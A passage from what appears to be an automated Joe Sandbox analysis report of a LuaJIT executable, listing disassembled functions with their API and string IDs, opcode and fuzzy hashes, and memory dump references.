                                                                                                                                                                        • Opcode Fuzzy Hash: aebac3cd1a26833e2af55c486e265236ad524e294da917c66b7e0629587f9230
                                                                                                                                                                        • Instruction Fuzzy Hash: 5D81A47391A20696EB68BF25804587CF7A1FB10B48F944C37CA4A46298DF3BF445E739
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738AE551C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 186COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID: $*
                                                                                                                                                                        • API String ID: 3215553584-3982473090
                                                                                                                                                                        • Opcode ID: 1b04caf276477af04b5d885976e20d85ac384d2c75b85c1de0808b5f727b4059
                                                                                                                                                                        • Instruction ID: a36084dc74851ecdfef0b8c8c77b4e9af17be66661e198fae963ff63e64d1592
                                                                                                                                                                        • Opcode Fuzzy Hash: 1b04caf276477af04b5d885976e20d85ac384d2c75b85c1de0808b5f727b4059
                                                                                                                                                                        • Instruction Fuzzy Hash: 1E81747380E246DAE764BF25A08497CF791EB01B44F980D37CA4946295CF3AF451E739
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738AFF800 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 177COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                        • String ID: "$sinh
                                                                                                                                                                        • API String ID: 1156100317-1232919748
                                                                                                                                                                        • Opcode ID: d4441f1067829586646d6e403ae08bbbbe116838e7bd38d72df8aa425cad948a
                                                                                                                                                                        • Instruction ID: 2eedd4aeeb6f031c1ae8a0bf443536522586b6cd3a9987cfb2bd6b8525a0e60f
                                                                                                                                                                        • Opcode Fuzzy Hash: d4441f1067829586646d6e403ae08bbbbe116838e7bd38d72df8aa425cad948a
                                                                                                                                                                        • Instruction Fuzzy Hash: 4491F233E29FC699D263AB34A4417B2F318AF5A391F508323E59E31A51DF3EA0439604
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738AE061C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CallEncodePointerTranslator
                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                        • API String ID: 3544855599-2084237596
                                                                                                                                                                        • Opcode ID: 36655cc38fdb37db5713a354792fa09f1dfbcf1d55a9f2e70b9818b2607edb59
                                                                                                                                                                        • Instruction ID: bdf898ec19a0b99cdaf8eb23a84a7b1c4bc7b53c13e5f4d91e6b8afc86d32bce
                                                                                                                                                                        • Opcode Fuzzy Hash: 36655cc38fdb37db5713a354792fa09f1dfbcf1d55a9f2e70b9818b2607edb59
                                                                                                                                                                        • Instruction Fuzzy Hash: 0261A933A0AB85DAE710EF65D0807ADB7A0FB44B88F444626EE4D13B98CF79E144D754
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738ADEF34 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Unwind__except_validate_context_record
                                                                                                                                                                        • String ID: csm$f
                                                                                                                                                                        • API String ID: 2208346422-629598281
                                                                                                                                                                        • Opcode ID: d98e7a07f294c52037bc1436f4614ab14783cba3f9a043537fabdfeef2d51ec6
                                                                                                                                                                        • Instruction ID: 6beb90e00563560a9594fabdd057d87759122efcbc92cff599e06aff502d33c5
                                                                                                                                                                        • Opcode Fuzzy Hash: d98e7a07f294c52037bc1436f4614ab14783cba3f9a043537fabdfeef2d51ec6
                                                                                                                                                                        • Instruction Fuzzy Hash: 7751B533A0A642A7DB14EB15E424F2AF755FB44B84F908030DA1E87788EF7EE945D718
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738AFF344 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                        • String ID: !$acos
                                                                                                                                                                        • API String ID: 1156100317-2870037509
                                                                                                                                                                        • Opcode ID: bf72582c257df8192f41e73549c3bb19c3b6f1f999e55f766029dc027c0b68c3
                                                                                                                                                                        • Instruction ID: d973efedbfeb8ec480fc9cd31820c0e4e0a3277d40b768547522a69349175e0c
                                                                                                                                                                        • Opcode Fuzzy Hash: bf72582c257df8192f41e73549c3bb19c3b6f1f999e55f766029dc027c0b68c3
                                                                                                                                                                        • Instruction Fuzzy Hash: 0161F723C1EF8A9AE223EF345810676E754AF96380F509333E91E31964DF3DE042A615
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738AFF0B8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                        • String ID: !$asin
                                                                                                                                                                        • API String ID: 1156100317-2188059690
                                                                                                                                                                        • Opcode ID: 9e38084c10780cd626a2090b3a56498ae94656eafe0a602bef55e7ad367d1a5b
                                                                                                                                                                        • Instruction ID: 6dcb9db1c7eb2c38a208d945e27ade1fa1c22abfc2489b024d5396aef543bcb9
                                                                                                                                                                        • Opcode Fuzzy Hash: 9e38084c10780cd626a2090b3a56498ae94656eafe0a602bef55e7ad367d1a5b
                                                                                                                                                                        • Instruction Fuzzy Hash: 8E51DA23D29F8A96E213DB349C10676E354BF96380F919337ED5E31960DF3EA0829619
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A78C80 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 105COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free_nolock
                                                                                                                                                                        • String ID: luaJIT_BC_%s$luaopen_%s$path too long
                                                                                                                                                                        • API String ID: 2882679554-1241789697
                                                                                                                                                                        • Opcode ID: 5dea574ca3d95739399a95e25b92153f106047c46926396060786645f98203ee
                                                                                                                                                                        • Instruction ID: 7c33dffff9e3f266d9bfa4e42ae45ab3b10bedc4de8f3fe3258d6a2e14971857
                                                                                                                                                                        • Opcode Fuzzy Hash: 5dea574ca3d95739399a95e25b92153f106047c46926396060786645f98203ee
                                                                                                                                                                        • Instruction Fuzzy Hash: 26515133A1DB4591E620AB55E44076EE7A1FBC4BD0F900532FA8D43BA9DF3ED440AB18
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B119F0 Relevance: 6.2, APIs: 4, Instructions: 159COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo$_get_daylight
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 72036449-0
                                                                                                                                                                        • Opcode ID: adda994bb8bdfca9ec35d26023c30ea6024999a432b5678b7d18df69566630e3
                                                                                                                                                                        • Instruction ID: 9479bb229d7b9ae2e3ccb61f6e3ae6275930d112e0bcf46ce911c81ef105a1b5
                                                                                                                                                                        • Opcode Fuzzy Hash: adda994bb8bdfca9ec35d26023c30ea6024999a432b5678b7d18df69566630e3
                                                                                                                                                                        • Instruction Fuzzy Hash: EF51F123F1CA1362F7686928840137EE982DB00714F996035CA1D8E2D5EE3FE940B66B
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A419C0 Relevance: 6.1, APIs: 4, Instructions: 64COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Context$CaptureEntryFunctionLookupRestoreUnwindVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3461063567-0
                                                                                                                                                                        • Opcode ID: b1f1ff61777923e7652156cc2d336024070dc023beb6a1960c7b554b607fa398
                                                                                                                                                                        • Instruction ID: 73853a914469b2ac945d9baf55c89a44e3aab90671b41f8b4ad17e251a3bf150
                                                                                                                                                                        • Opcode Fuzzy Hash: b1f1ff61777923e7652156cc2d336024070dc023beb6a1960c7b554b607fa398
                                                                                                                                                                        • Instruction Fuzzy Hash: AC310636919BC595EA609B11E4547AAF3A1F7C9780F900036D68D43B68DF7ED058DB04
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B108C0 Relevance: 6.1, APIs: 4, Instructions: 53synchronizationCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2321548817-0
                                                                                                                                                                        • Opcode ID: 82bfb5b300ae42bcdd7f9df15edbfe6164371cee34962632e7edd6329cc57e45
                                                                                                                                                                        • Instruction ID: edbbd3b6524eb6167052c9ce62c2a54b77d80ddeade5a6f238bb4d042901ec98
                                                                                                                                                                        • Opcode Fuzzy Hash: 82bfb5b300ae42bcdd7f9df15edbfe6164371cee34962632e7edd6329cc57e45
                                                                                                                                                                        • Instruction Fuzzy Hash: 9211A823A0928392FA507F2AD41027DE291AF45FF0F944230D92D4B6D4DF3DF442A72A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738AE4C2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 153COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-3916222277
                                                                                                                                                                        • Opcode ID: f63cfcab38654406720fb298faccf2206334f1ee504fa2844d0f42e958091265
                                                                                                                                                                        • Instruction ID: 879129e1f5d155a8a003e5bbdecbade028672895b9baf67089e22540880ab42d
                                                                                                                                                                        • Opcode Fuzzy Hash: f63cfcab38654406720fb298faccf2206334f1ee504fa2844d0f42e958091265
                                                                                                                                                                        • Instruction Fuzzy Hash: 2E61A97390F91296E768AF24C08477CF7A9EB01B08F941577C64A42195CF3AF681E729
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738AE5308 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-3916222277
                                                                                                                                                                        • Opcode ID: 0644313d939e58621442b79405c350c91277a9df8c69c39d18cf3d825145f917
                                                                                                                                                                        • Instruction ID: 67c956dc313070c9bf3d94ed88f9c7d00345f189aeb6980dcf78ae0d02dd753d
                                                                                                                                                                        • Opcode Fuzzy Hash: 0644313d939e58621442b79405c350c91277a9df8c69c39d18cf3d825145f917
                                                                                                                                                                        • Instruction Fuzzy Hash: C961C97391F61296E764AF28E05447CF7A6FB05B09F941537D60A02A94CF3EF441EB28
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738AE50F4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-3916222277
                                                                                                                                                                        • Opcode ID: c220197af0a98cbd73017d0ba252ed5d07ee06621c5253f39b4124477447de71
                                                                                                                                                                        • Instruction ID: fb4f9348224896e507c3ebbe22a88d9da312a07cce9d951c7d1ecdbbcb2d2009
                                                                                                                                                                        • Opcode Fuzzy Hash: c220197af0a98cbd73017d0ba252ed5d07ee06621c5253f39b4124477447de71
                                                                                                                                                                        • Instruction Fuzzy Hash: 20619A7390A202A6EB64BF28E044B7CF7A5EB15B48F941537C60A461D5CF3EF441EB29
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738AE57B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-3916222277
                                                                                                                                                                        • Opcode ID: b2dd0ee893780d50b4674af438db78039d6ef4c60853aa3ea8af484d06fe7f99
                                                                                                                                                                        • Instruction ID: 0b096650e6259102d6c190ca1b466d150725cfad95fffd5d706de7c290dc9a58
